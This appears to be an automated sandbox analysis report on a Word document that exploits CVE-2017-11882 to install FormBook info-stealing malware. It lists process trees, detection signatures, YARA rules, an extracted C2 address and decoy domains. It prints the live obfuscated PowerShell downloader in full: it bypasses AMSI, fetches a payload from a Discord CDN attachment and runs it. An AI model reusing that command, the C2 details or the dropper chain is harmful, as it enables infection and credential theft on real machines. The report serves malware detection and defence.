Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ-18072 QPHN .doc

Overview

General Information

Sample Name:RFQ-18072 QPHN .doc
Analysis ID:532835
MD5:dc496cbd7363e5eaded70c3b82d945b4
SHA1:1cba05eefbf3dd00f0e09591e676b9d2674319be
SHA256:7398809e85fd3717f942bae422ed238f230d214359819afe88ae28e619b3b7b1
Tags:docFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document contains OLE streams which likely are hidden ActiveX objects
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Document contains OLE streams with names of living off the land binaries
Creates processes via WMI
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Tries to detect virtualization through RDTSC time measurements
Sigma detected: WScript or CScript Dropper
Sample uses process hollowing technique
Writes to foreign memory regions
Sigma detected: Microsoft Office Product Spawning Windows Shell
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Very long command line found
Microsoft Office drops suspicious files
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Office Equation Editor has been started
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 632 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1200 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 668 cmdline: CmD.exe /C cscript %tmp%\Client.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 1176 cmdline: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)
  • powershell.exe (PID: 2700 cmdline: Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,56,48,48,55,52,48,52,54,50,54,54,50,47,109,111,110,111,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($0462662046266204626620462662046266204626620462662)|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 3044 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • cmmon32.exe (PID: 2696 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: EA7BAAB0792C846DE451001FAE0FBD5F)
          • cmd.exe (PID: 2832 cmdline: /c del "C:\WINDOWS\syswow64\calc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.getyourshoponline.com/t3t2/"], "decoy": ["professorphilipkaloki.com", "restorationlifeplus.com", "worldfreegamez.com", "paulasnaturalelements.com", "vecydoy.xyz", "certifiedhalina.com", "roundrockmail.com", "dyort.com", "ge3f.xyz", "skafina.store", "centsablefinancialplanning.com", "avatarig.com", "meta-x.store", "metataxbit.com", "contact-ebf.com", "soungy.com", "theoptiontwo.com", "pangeadba.com", "imovelemoradia.com", "almisanbs.net", "tracarau.info", "waterfallswisconsinplus.xyz", "d6f0tmpjmk9eutnnvfk4716.com", "kafani.xyz", "myponzu.com", "indigovideography.com", "poolcomplaints.com", "metaboxgame.xyz", "dtbd.net", "nocallwaiting.com", "imim-token.com", "annaitherasa.com", "caratnaked.com", "nnhu.space", "ballufa.bet", "theoudhy.com", "theroadbrand.store", "voguishshop.com", "wintangible.com", "cornheaderparts.com", "pulpbranding.com", "ambulante-reha-muenchen.com", "xd7bh22mc04.xyz", "keldefi.com", "maman-travail.com", "socialbizz.xyz", "shopauthentictampabayrays.com", "camylo.online", "zhangchanghong.com", "tafelimited.com", "eminkoy.com", "towne-kitchen.com", "marcasemele.com", "203.life", "innerrackers.com", "fddf.xyz", "sweettreatworld.com", "freeze-the-fat-away.com", "lillianpsmith.com", "fabulouspatricia.com", "sling-city.com", "wavesmodel.com", "africanancesry.com", "os-meta.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
  • 0x3000:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0x3021:$font: 0A 01 08 5A 5A
  • 0x3052:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0x2f00:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x3029:$exe: .exe
  • 0x3052:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x7927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x892a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.calc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        11.2.calc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        11.2.calc.exe.400000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        11.0.calc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.0.calc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1200, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 668
          Sigma detected: Suspicious Script Execution From Temp FolderShow sources
          Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 668, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 1176
          Sigma detected: WScript or CScript DropperShow sources
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 668, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 1176
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1200, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 668

          Data Obfuscation:

          barindex
          Sigma detected: Office product drops script at suspicious locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 632, TargetFilename: C:\Users\user\AppData\Local\Temp\Client.vbs

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Found malware configurationShow sources
          Source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.getyourshoponline.com/t3t2/"], "decoy": ["professorphilipkaloki.com", "restorationlifeplus.com", "worldfreegamez.com", "paulasnaturalelements.com", "vecydoy.xyz", "certifiedhalina.com", "roundrockmail.com", "dyort.com", "ge3f.xyz", "skafina.store", "centsablefinancialplanning.com", "avatarig.com", "meta-x.store", "metataxbit.com", "contact-ebf.com", "soungy.com", "theoptiontwo.com", "pangeadba.com", "imovelemoradia.com", "almisanbs.net", "tracarau.info", "waterfallswisconsinplus.xyz", "d6f0tmpjmk9eutnnvfk4716.com", "kafani.xyz", "myponzu.com", "indigovideography.com", "poolcomplaints.com", "metaboxgame.xyz", "dtbd.net", "nocallwaiting.com", "imim-token.com", "annaitherasa.com", "caratnaked.com", "nnhu.space", "ballufa.bet", "theoudhy.com", "theroadbrand.store", "voguishshop.com", "wintangible.com", "cornheaderparts.com", "pulpbranding.com", "ambulante-reha-muenchen.com", "xd7bh22mc04.xyz", "keldefi.com", "maman-travail.com", "socialbizz.xyz", "shopauthentictampabayrays.com", "camylo.online", "zhangchanghong.com", "tafelimited.com", "eminkoy.com", "towne-kitchen.com", "marcasemele.com", "203.life", "innerrackers.com", "fddf.xyz", "sweettreatworld.com", "freeze-the-fat-away.com", "lillianpsmith.com", "fabulouspatricia.com", "sling-city.com", "wavesmodel.com", "africanancesry.com", "os-meta.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ-18072 QPHN .docReversingLabs: Detection: 15%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.533047014.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.510963723.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695505990.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493675767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORY
          Source: 11.0.calc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.calc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.calc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Found potential equation exploit (CVE-2017-11882)Show sources
          Source: Static RTF information: Object: 1 Offset: 0001CF23h
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drStream path '_1699975275/\x1CompObj' : ...........................F....Microsoft Equation
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: Binary string: cmmon32.pdb source: calc.exe, 0000000B.00000002.533017208.0000000000030000.00000040.00020000.sdmp, calc.exe, 0000000B.00000002.533290649.0000000000314000.00000004.00000020.sdmp
          Source: Binary string: cmmon32.pdbr2v source: calc.exe, 0000000B.00000002.533017208.0000000000030000.00000040.00020000.sdmp, calc.exe, 0000000B.00000002.533290649.0000000000314000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.493968976.00000000004A0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.533434847.0000000000790000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.533685912.0000000000910000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.495023478.0000000000600000.00000004.00000001.sdmp, cmmon32.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.vbsJump to behavior
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.134.233:443
          Source: global trafficDNS query: name: google.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.134.233:443

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.eminkoy.com
          Source: C:\Windows\explorer.exeDomain query: www.towne-kitchen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.getyourshoponline.com/t3t2/
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /t3t2/?YTX8m6=X/AHJ1G8CzET27bRNAkcy2zo056pG+X2bUgtrIM6Usdw2LVzhx3zymRQr/cABPSK+z/Wow==&GZS=5jiXYnvXE6 HTTP/1.1Host: www.eminkoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /attachments/915347845752705109/915799800740462662/mono.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000C.00000000.515274931.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: WINWORD.EXE, 00000000.00000002.576587215.000000000785E000.00000004.00000001.sdmpString found in binary or memory: http://scas.openformatrg/drawml/2006/main
          Source: WINWORD.EXE, 00000000.00000002.576557721.000000000782E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.576606148.000000000788E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
          Source: WINWORD.EXE, 00000000.00000002.576557721.000000000782E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
          Source: WINWORD.EXE, 00000000.00000002.576606148.000000000788E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
